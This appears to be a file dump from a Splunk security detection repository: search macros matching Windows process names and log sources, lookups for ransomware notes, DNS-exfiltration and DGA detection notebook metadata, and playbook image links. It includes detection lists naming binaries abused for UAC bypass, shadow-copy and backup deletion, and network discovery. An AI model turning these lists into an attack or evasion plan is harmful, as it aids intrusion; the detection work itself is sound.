/macros/process_runas.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=runas.exe OR Processes.original_file_name=runas.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_runas

--------------------------------------------------------------------------------
/macros/process_rundll32.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=rundll32.exe OR Processes.original_file_name=RUNDLL32.EXE)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_rundll32

--------------------------------------------------------------------------------
/macros/process_sc.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name="sc.exe" OR Processes.original_file_name="sc.exe")
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_sc

--------------------------------------------------------------------------------
/macros/process_schtasks.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=schtasks.exe OR Processes.original_file_name=schtasks.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_schtasks

--------------------------------------------------------------------------------
/macros/process_sdelete.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=sdelete.exe OR Processes.original_file_name=sdelete.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_sdelete

--------------------------------------------------------------------------------
/macros/process_setspn.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=setspn.exe OR Processes.original_file_name=setspn.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_setspn

--------------------------------------------------------------------------------
/macros/process_sqlcmd.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=sqlcmd.exe OR Processes.original_file_name=sqlcmd.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_sqlcmd

--------------------------------------------------------------------------------
/macros/process_verclsid.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=verclsid.exe OR Processes.original_file_name=verclsid.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_verclsid

--------------------------------------------------------------------------------
/macros/process_vssadmin.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=vssadmin.exe OR Processes.original_file_name=VSSADMIN.EXE)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_vssadmin

--------------------------------------------------------------------------------
/macros/process_wbadmin.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=wbadmin.exe OR Processes.original_file_name=WBADMIN.EXE)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_wbadmin

--------------------------------------------------------------------------------
/macros/process_wermgr.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=wermgr.exe OR Processes.original_file_name=wermgr.EXE)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_wermgr

--------------------------------------------------------------------------------
/macros/process_wmic.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=wmic.exe OR Processes.original_file_name=wmic.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_wmic

-------------------------------------------------------------------------------- /macros/process_wscript.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=wscript.exe OR Processes.original_file_name=wscript.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_wscript 4 | -------------------------------------------------------------------------------- /macros/prohibited_apps_launching_cmd_macro.yml: -------------------------------------------------------------------------------- 1 | definition: '| inputlookup prohibited_apps_launching_cmd | rename prohibited_applications 2 | as parent_process_name | eval parent_process_name="*" . parent_process_name | table 3 | parent_process_name' 4 | description: This macro outputs a list of process that should not be the parent process 5 | of cmd.exe 6 | name: prohibited_apps_launching_cmd_macro 7 | -------------------------------------------------------------------------------- /macros/prohibited_softwares.yml: -------------------------------------------------------------------------------- 1 | definition: search * 2 | description: This macro is deprecated. 
Update this macro to look for prohibited softwares in your environment 3 | name: prohibited_softwares 4 | -------------------------------------------------------------------------------- /macros/ransomware_extensions.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true ransomware_extensions_lookup Extensions AS file_extension OUTPUT Extensions Name | search Name !=False 2 | description: This macro limits the output to files that have extensions associated 3 | with ransomware 4 | name: ransomware_extensions 5 | -------------------------------------------------------------------------------- /macros/ransomware_notes.yml: -------------------------------------------------------------------------------- 1 | definition: lookup ransomware_notes_lookup ransomware_notes as file_name OUTPUT status 2 | as "Known Ransomware Notes" | search "Known Ransomware Notes"=True 3 | description: This macro limits the output to files that have been identified as a 4 | ransomware note 5 | name: ransomware_notes 6 | -------------------------------------------------------------------------------- /macros/remoteconnectionmanager.yml: -------------------------------------------------------------------------------- 1 | definition: (source="WinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational" OR source="XmlWinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: remoteconnectionmanager -------------------------------------------------------------------------------- /macros/remove_valid_domains.yml: -------------------------------------------------------------------------------- 1 | definition: eval domain=trim(domain,"*") | search NOT[| inputlookup domains] NOT[ 2 | |inputlookup cim_corporate_email_domain_lookup] NOT[inputlookup cim_corporate_web_domain_lookup] 3 | | eval domain="*"+domain+"*" 4 | description: This macro removes valid domains from the output 5 | name: remove_valid_domains 6 | -------------------------------------------------------------------------------- /macros/risk_index.yml: -------------------------------------------------------------------------------- 1 | definition: index=risk 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: risk_index 5 | -------------------------------------------------------------------------------- /macros/s3_accesslogs.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=aws:s3:accesslogs 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for AWS cloudwatch vpc logs. Replace the macro definition with configurations for your Splunk Environment. 
3 | name: s3_accesslogs 4 | -------------------------------------------------------------------------------- /macros/security_content_ctime.yml: -------------------------------------------------------------------------------- 1 | arguments: 2 | - field 3 | definition: 'convert timeformat="%Y-%m-%dT%H:%M:%S" ctime($field$)' 4 | description: convert epoch time to string 5 | name: security_content_ctime 6 | -------------------------------------------------------------------------------- /macros/security_content_summariesonly.yml: -------------------------------------------------------------------------------- 1 | definition: summariesonly=`summariesonly_config` allow_old_summaries=`oldsummaries_config` fillnull_value=`fillnull_config` 2 | description: search data model's summaries only 3 | name: security_content_summariesonly 4 | -------------------------------------------------------------------------------- /macros/security_group_api_calls.yml: -------------------------------------------------------------------------------- 1 | definition: (eventName=AuthorizeSecurityGroupIngress OR eventName=CreateSecurityGroup 2 | OR eventName=DeleteSecurityGroup OR eventName=DescribeClusterSecurityGroups OR eventName=DescribeDBSecurityGroups 3 | OR eventName=DescribeSecurityGroupReferences OR eventName=DescribeSecurityGroups 4 | OR eventName=DescribeStaleSecurityGroups OR eventName=RevokeSecurityGroupIngress 5 | OR eventName=UpdateSecurityGroupRuleDescriptionsIngress) 6 | description: This macro is a list of AWS event names associated with security groups 7 | name: security_group_api_calls 8 | -------------------------------------------------------------------------------- /macros/stream_dns.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=stream:dns 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 
3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: stream_dns -------------------------------------------------------------------------------- /macros/stream_http.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=stream:http 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: stream_http 5 | -------------------------------------------------------------------------------- /macros/stream_tcp.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=stream:tcp 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: stream_tcp -------------------------------------------------------------------------------- /macros/subjectinterfacepackage.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="PwSh:SubjectInterfacePackage" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: subjectinterfacepackage -------------------------------------------------------------------------------- /macros/summariesonly_config.yml: -------------------------------------------------------------------------------- 1 | definition: "false" 2 | description: Used inside security_content_summariesonly to adjust the summariesonly configuration 3 | name: summariesonly_config 4 | -------------------------------------------------------------------------------- /macros/suricata.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=suricata 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: suricata 5 | -------------------------------------------------------------------------------- /macros/suspicious_email_attachments.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true is_suspicious_file_extension_lookup file_name OUTPUT suspicious 2 | | search suspicious=true 3 | description: This macro limits the output to email attachments that have suspicious 4 | extensions 5 | name: suspicious_email_attachments 6 | -------------------------------------------------------------------------------- /macros/suspicious_writes.yml: -------------------------------------------------------------------------------- 1 | definition: lookup suspicious_writes_lookup file as file_name OUTPUT note as "Reference" 2 | | search "Reference" != False 3 | description: This macro limites the output to file names that have been marked as 4 | suspicious 5 | name: suspicious_writes 6 | -------------------------------------------------------------------------------- /macros/sysmon.yml: -------------------------------------------------------------------------------- 1 | definition: (source=WinEventLog:Microsoft-Windows-Sysmon/Operational OR 
source=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational OR source=Syslog:Linux-Sysmon/Operational) 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: sysmon 5 | -------------------------------------------------------------------------------- /macros/system_network_configuration_discovery_tools.yml: -------------------------------------------------------------------------------- 1 | definition: (process_name="arp.exe" OR process_name="dsquery.exe" OR process_name="hostname.exe" OR process_name="ipconfig.exe" OR process_name="nbstat.exe" OR process_name="net.exe" OR process_name="netsh.exe" OR process_name="nslookup.exe" OR process_name= "ping.exe" OR process_name= "quser.exe" OR process_name="qwinsta.exe" OR process_name= "telnet.exe" OR process_name= "tracert.exe") 2 | description: This macro is a list of processes that can be used to discover the network configuration 3 | name: system_network_configuration_discovery_tools 4 | -------------------------------------------------------------------------------- /macros/uacbypass_process_name.yml: -------------------------------------------------------------------------------- 1 | definition: 'BitlockerWizardElev.exe,cliconfg.exe,clipup.exe,cmstp.exe,CompMgmtLauncher.exe,consent.exe,control.exe,credwiz.exe,dccw.exe,dismhost.exe,EventVwr.exe,fodhelper.exe,GWXUXWorker.exe,inetmgr.exe,iscsicli.exe,mcx2prov.exe,migwiz.exe,mmc.exe,msconfig.exe,oobe.exe,osk.exe,pkgmgr.exe,recdisc.exe,rstrui.exe,sdclt.exe,setupsqm.exe,slui.exe,sysprep.exe,SystemPropertiesAdvanced.exe,taskhost.exe,TpmInit.exe,tzsync.exe,w32tm.exe,WerFault.exe,WSReset.exe,wusa.exe' 2 | description: A listing of processes known to be abused for User Account Control bypass exploitation. 
3 | name: uacbypass_process_name -------------------------------------------------------------------------------- /macros/windows_exchange_iis.yml: -------------------------------------------------------------------------------- 1 | definition: (sourcetype="MSWindows:2003:IIS" OR sourcetype="MSWindows:2008R2:IIS" OR sourcetype="MSWindows:2010EWS:IIS" OR sourcetype="MSWindows:2012:IIS" OR sourcetype="MSWindows:2013EWS:IIS") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: windows_exchange_iis 5 | -------------------------------------------------------------------------------- /macros/windows_shells.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=cmd.exe OR Processes.process_name=powershell.exe OR Processes.process_name=pwsh.exe OR Processes.process_name=sh.exe OR Processes.process_name=bash.exe OR Processes.process_name=wscript.exe OR Processes.process_name=cscript.exe) 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: windows_shells 5 | -------------------------------------------------------------------------------- /macros/wineventlog_application.yml: -------------------------------------------------------------------------------- 1 | definition: eventtype="wineventlog_application" OR Channel="application" OR source="XmlWinEventLog:Application" OR source="WinEventLog:Application" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: wineventlog_application -------------------------------------------------------------------------------- /macros/wineventlog_rdp.yml: -------------------------------------------------------------------------------- 1 | definition: (source="WinEventLog:Microsoft-Windows-TerminalServices-RDPClient/Operational" OR source="XmlWinEventLog:Microsoft-Windows-TerminalServices-RDPClient/Operational") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk environment. 4 | name: wineventlog_rdp 5 | -------------------------------------------------------------------------------- /macros/wineventlog_security.yml: -------------------------------------------------------------------------------- 1 | definition: eventtype="wineventlog_security" OR Channel="security" OR source="XmlWinEventLog:Security" OR source="WinEventLog:Security" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk environment. 4 | name: wineventlog_security 5 | -------------------------------------------------------------------------------- /macros/wineventlog_system.yml: -------------------------------------------------------------------------------- 1 | definition: eventtype="wineventlog_system" OR Channel="system" OR source="XmlWinEventLog:System" OR source="WinEventLog:System" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk environment. 
4 | name: wineventlog_system 5 | -------------------------------------------------------------------------------- /macros/wineventlog_task_scheduler.yml: -------------------------------------------------------------------------------- 1 | definition: (source="XmlWinEventLog:Microsoft-Windows-TaskScheduler/Operational" OR source="WinEventLog:Microsoft-Windows-TaskScheduler/Operational") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk environment. 4 | name: wineventlog_task_scheduler -------------------------------------------------------------------------------- /macros/wmi.yml: -------------------------------------------------------------------------------- 1 | definition: (source="WinEventLog:Microsoft-Windows-WMI-Activity/Operational" OR source="XmlWinEventLog:Microsoft-Windows-WMI-Activity/Operational") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: wmi 5 | -------------------------------------------------------------------------------- /macros/zeek_rpc.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="zeek:rpc:json" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: zeek_rpc 5 | -------------------------------------------------------------------------------- /macros/zeek_ssl.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="zeek:ssl:json" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: zeek_ssl 5 | -------------------------------------------------------------------------------- /macros/zeek_x509.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="zeek:x509:json" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: zeek_x509 5 | -------------------------------------------------------------------------------- /macros/zscaler_proxy.yml: -------------------------------------------------------------------------------- 1 | definition: source=zscaler sourcetype=zscalernss-web 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: zscaler_proxy 5 | -------------------------------------------------------------------------------- /notebooks/cisa_commonalities_notebook.yml: -------------------------------------------------------------------------------- 1 | description: a simple jupyter notebook that helps Splunk Threat Research Team sees the data connections, commonalities and differences of security content stories or threat families. 
2 | filename: cisa_commonalities_notebook.ipynb 3 | name: cisa_commonalities_notebook -------------------------------------------------------------------------------- /notebooks/detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml: -------------------------------------------------------------------------------- 1 | description: A Jupyter notebook for detecting DNS data exfiltration using a pre-trained model in DSDL 2 | filename: detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.ipynb 3 | name: detect_dns_data_exfiltration_using_pretrained_model_in_dsdl -------------------------------------------------------------------------------- /notebooks/detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.json: -------------------------------------------------------------------------------- 1 | {"options": {"params": {"mode": "stage", "algo": "detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl"}, "args": ["is_unknown", "text"], "target_variable": ["is_unknown"], "feature_variables": ["text"], "model_name": "detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl", "algo_name": "MLTKContainer", "mlspl_limits": {"handle_new_cat": "default", "max_distinct_cat_values": "100", "max_distinct_cat_values_for_classifiers": "100", "max_distinct_cat_values_for_scoring": "100", "max_fit_time": "600", "max_inputs": "100000", "max_memory_usage_mb": "4000", "max_model_size_mb": "30", "max_score_time": "600", "use_sampling": "true"}, "kfold_cv": null}, "feature_variables": ["text"], "target_variables": ["is_unknown"]} -------------------------------------------------------------------------------- /notebooks/detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml: -------------------------------------------------------------------------------- 1 | description: A Jupyter notebook for detecting suspicious DNS TXT records using a pre-trained model in DSDL 2 | filename: 
detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.ipynb 3 | name: detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl -------------------------------------------------------------------------------- /notebooks/detect_suspicious_processnames_using_pretrained_model_in_dsdl.json: -------------------------------------------------------------------------------- 1 | {"options": {"params": {"mode": "stage", "algo": "detect_suspicious_processnames_using_pretrained_model_in_dsdl"}, "args": ["label", "text"], "target_variable": ["label"], "feature_variables": ["text"], "model_name": "detect_suspicious_processnames_using_pretrained_model_in_dsdl", "algo_name": "MLTKContainer", "mlspl_limits": {"handle_new_cat": "default", "max_distinct_cat_values": "100", "max_distinct_cat_values_for_classifiers": "100", "max_distinct_cat_values_for_scoring": "100", "max_fit_time": "600", "max_inputs": "100000", "max_memory_usage_mb": "4000", "max_model_size_mb": "30", "max_score_time": "600", "use_sampling": "true"}, "kfold_cv": null}, "feature_variables": ["text"], "target_variables": ["label"]} -------------------------------------------------------------------------------- /notebooks/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml: -------------------------------------------------------------------------------- 1 | description: A Jupyter notebook for detecting suspicious process names using a pre-trained model in DSDL 2 | filename: detect_suspicious_processnames_using_pretrained_model_in_dsdl.ipynb 3 | name: detect_suspicious_processnames_using_pretrained_model_in_dsdl -------------------------------------------------------------------------------- /notebooks/pretrained_dga_detection.yml: -------------------------------------------------------------------------------- 1 | description: A Jupyter notebook for detecting DGA domains using a pre-trained model in DSDL 2 | filename: pretrained_dga_model_dsdl.ipynb 3 | name: pretrained_dga_model_dsdl 
-------------------------------------------------------------------------------- /notebooks/pretrained_dga_model_dsdl.json: -------------------------------------------------------------------------------- 1 | {"options": {"params": {"mode": "stage", "algo": "pretrained_dga_model_dsdl"}, "args": ["is_dga", "domain"], "target_variable": ["is_dga"], "feature_variables": ["domain"], "model_name": "pretrained_dga_model_dsdl", "algo_name": "MLTKContainer", "mlspl_limits": {"handle_new_cat": "default", "max_distinct_cat_values": "100", "max_distinct_cat_values_for_classifiers": "100", "max_distinct_cat_values_for_scoring": "100", "max_fit_time": "600", "max_inputs": "100000", "max_memory_usage_mb": "4000", "max_model_size_mb": "30", "max_score_time": "600", "use_sampling": "true"}, "kfold_cv": null}, "feature_variables": ["domain"], "target_variables": ["is_dga"]} -------------------------------------------------------------------------------- /playbooks/AD_LDAP_Account_Locking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AD_LDAP_Account_Locking.png -------------------------------------------------------------------------------- /playbooks/AD_LDAP_Account_Unlocking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AD_LDAP_Account_Unlocking.png -------------------------------------------------------------------------------- /playbooks/AD_LDAP_Entity_Attribute_Lookup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AD_LDAP_Entity_Attribute_Lookup.png -------------------------------------------------------------------------------- 
/playbooks/AWS_IAM_Account_Locking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AWS_IAM_Account_Locking.png -------------------------------------------------------------------------------- /playbooks/AWS_IAM_Account_Unlocking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/AWS_IAM_Account_Unlocking.png -------------------------------------------------------------------------------- /playbooks/Active_Directory_Disable_Account_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Active_Directory_Disable_Account_Dispatch.png -------------------------------------------------------------------------------- /playbooks/Active_Directory_Enable_Account_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Active_Directory_Enable_Account_Dispatch.png -------------------------------------------------------------------------------- /playbooks/Attribute_Lookup_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Attribute_Lookup_Dispatch.png -------------------------------------------------------------------------------- /playbooks/Automated_Enrichment.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Automated_Enrichment.png -------------------------------------------------------------------------------- /playbooks/Azure_AD_Account_Locking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Azure_AD_Account_Locking.png -------------------------------------------------------------------------------- /playbooks/Azure_AD_Account_Unlocking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Azure_AD_Account_Unlocking.png -------------------------------------------------------------------------------- /playbooks/Azure_AD_Graph_User_Attribute_Lookup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Azure_AD_Graph_User_Attribute_Lookup.png -------------------------------------------------------------------------------- /playbooks/CiscoTalosIntelligence_Identifier_Reputation_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CiscoTalosIntelligence_Identifier_Reputation_Analysis.png -------------------------------------------------------------------------------- /playbooks/Cisco_Umbrella_DNS_Denylisting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Cisco_Umbrella_DNS_Denylisting.png 
-------------------------------------------------------------------------------- /playbooks/CrowdStrike_OAuth_API_Device_Attribute_Lookup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CrowdStrike_OAuth_API_Device_Attribute_Lookup.png -------------------------------------------------------------------------------- /playbooks/CrowdStrike_OAuth_API_Dynamic_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CrowdStrike_OAuth_API_Dynamic_Analysis.png -------------------------------------------------------------------------------- /playbooks/CrowdStrike_OAuth_API_Identifier_Activity_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/CrowdStrike_OAuth_API_Identifier_Activity_Analysis.png -------------------------------------------------------------------------------- /playbooks/DNS_Denylisting_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/DNS_Denylisting_Dispatch.png -------------------------------------------------------------------------------- /playbooks/Dynamic_Analysis_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Dynamic_Analysis_Dispatch.png -------------------------------------------------------------------------------- /playbooks/G_Suite_for_GMail_Message_Identifier_Activity_Analysis.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/G_Suite_for_GMail_Message_Identifier_Activity_Analysis.png -------------------------------------------------------------------------------- /playbooks/G_Suite_for_Gmail_Message_Eviction.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/G_Suite_for_Gmail_Message_Eviction.png -------------------------------------------------------------------------------- /playbooks/G_Suite_for_Gmail_Search_and_Purge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/G_Suite_for_Gmail_Search_and_Purge.png -------------------------------------------------------------------------------- /playbooks/Identifier_Activity_Analysis_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Identifier_Activity_Analysis_Dispatch.png -------------------------------------------------------------------------------- /playbooks/Identifier_Reputation_Analysis_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Identifier_Reputation_Analysis_Dispatch.png -------------------------------------------------------------------------------- /playbooks/Jira_Related_Tickets_Search.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Jira_Related_Tickets_Search.png -------------------------------------------------------------------------------- /playbooks/MS_Graph_for_Office_365_Message_Eviction.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Message_Eviction.png -------------------------------------------------------------------------------- /playbooks/MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.png -------------------------------------------------------------------------------- /playbooks/MS_Graph_for_Office_365_Message_Restore.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Message_Restore.png -------------------------------------------------------------------------------- /playbooks/MS_Graph_for_Office_365_Search_and_Purge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Search_and_Purge.png -------------------------------------------------------------------------------- /playbooks/MS_Graph_for_Office_365_Search_and_Restore.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/MS_Graph_for_Office_365_Search_and_Restore.png -------------------------------------------------------------------------------- /playbooks/Panorama_Outbound_Traffic_Filtering.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Panorama_Outbound_Traffic_Filtering.png -------------------------------------------------------------------------------- /playbooks/PhishTank_URL_Reputation_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/PhishTank_URL_Reputation_Analysis.png -------------------------------------------------------------------------------- /playbooks/Related_Tickets_Search_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Related_Tickets_Search_Dispatch.png -------------------------------------------------------------------------------- /playbooks/ServiceNow_Related_Tickets_Search.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/ServiceNow_Related_Tickets_Search.png -------------------------------------------------------------------------------- /playbooks/Splunk_Attack_Analyzer_Dynamic_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Attack_Analyzer_Dynamic_Analysis.png 
-------------------------------------------------------------------------------- /playbooks/Splunk_Automated_Email_Investigation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Automated_Email_Investigation.png -------------------------------------------------------------------------------- /playbooks/Splunk_Identifier_Activity_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Identifier_Activity_Analysis.png -------------------------------------------------------------------------------- /playbooks/Splunk_Message_Identifier_Activity_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Message_Identifier_Activity_Analysis.png -------------------------------------------------------------------------------- /playbooks/Splunk_Notable_Related_Tickets_Search.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Splunk_Notable_Related_Tickets_Search.png -------------------------------------------------------------------------------- 